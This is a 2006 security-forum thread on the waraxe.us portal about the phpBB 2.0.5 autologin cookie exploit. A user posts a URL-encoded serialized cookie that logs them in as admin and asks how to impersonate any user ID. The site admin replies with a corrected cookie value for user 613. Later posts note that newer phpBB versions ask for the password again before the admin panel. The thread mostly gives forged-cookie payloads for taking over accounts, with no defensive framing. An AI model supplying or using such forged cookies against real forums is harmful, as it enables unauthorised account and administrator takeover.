|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Use PHPBB cookie exploit for any user? |
|
Posted: Tue Jun 27, 2006 4:42 pm |
|
|
cheaparse |
Beginner |
|
|
Joined: Jun 27, 2006 |
Posts: 2 |
|
|
|
|
|
|
|
i have a question guys, on a phpbb 2.0.5 forum, i have logged in under admin with the cookie:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
and it works fine, i can do admin etc. so i logged out, but i want to know how i would be able to log in under any user. for example if i wanted to log in under the user with a uid of 613, it should be this correct ? :
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%26132%22%3B%7D
but it doesn't let me, i just keep getting sent back to the log in screen
i tried it with other uids, but i still couldn't log in, please help |
|
|
|
|
|
|
|
|
Posted: Tue Jun 27, 2006 10:23 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Try this:
Code: |
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A3%3A%22613%22%3B%7D
|
P.S. I am going to put up online urldecoder/encoder soon. It will be useful for such string transformations as this specific cookie manipulation.
Stay in touch! |
|
|
|
|
Posted: Sat Jul 01, 2006 12:00 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
|
|
|
|
Posted: Mon Jul 03, 2006 6:17 pm |
|
|
superninja |
Active user |
|
|
Joined: Jul 03, 2006 |
Posts: 38 |
|
|
|
|
|
|
|
hi whats this decoder do? |
|
|
|
|
Posted: Mon Jul 03, 2006 9:48 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
superninja wrote: |
hi whats this decoder do? |
It will make "foo bar" to "foo%20bar" and vice versa.
If you look at url in browser, then you will see often "strange"
text, filled with "%" signs. Right? This is so called "urlencoded" text. |
|
|
|
|
Posted: Mon Jul 03, 2006 9:51 pm |
|
|
superninja |
Active user |
|
|
Joined: Jul 03, 2006 |
Posts: 38 |
|
|
|
|
|
|
|
oh i get it it's like & split the variables in php |
|
|
|
|
Posted: Mon Jul 03, 2006 10:28 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
|
|
|
|
Posted: Tue Jul 04, 2006 9:01 am |
|
|
R0cK3R |
Regular user |
|
|
Joined: Jul 04, 2006 |
Posts: 5 |
|
|
|
|
|
|
|
Oh yea...i have a problem with this cookie...i cant login as an admin...i do everything ok...the go to administration panel link reveals just fine...but then it asks me for password and user..and i cant login:o omg...some help...? |
|
|
|
|
Posted: Tue Jul 04, 2006 9:32 am |
|
|
R0cK3R |
Regular user |
|
|
Joined: Jul 04, 2006 |
Posts: 5 |
|
|
|
|
|
|
|
Ok sorry:p i am a beginner to this forum ...i think i ve found what i was looking for..thx |
|
|
|
|
Posted: Tue Jul 04, 2006 11:03 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
R0cK3R wrote: | Oh yea...i have a problem with this cookie...i cant login as an admin...i do everything ok...the go to administration panel link reveals just fine...but then it asks me for password and user..and i cant login:o omg...some help...? |
Yep, this is special protection measure in all new phpbb versions. This is meant to make phpbb haxoring harder and it actually does
When i wrote that tutorial, there was no additional password asking ... |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|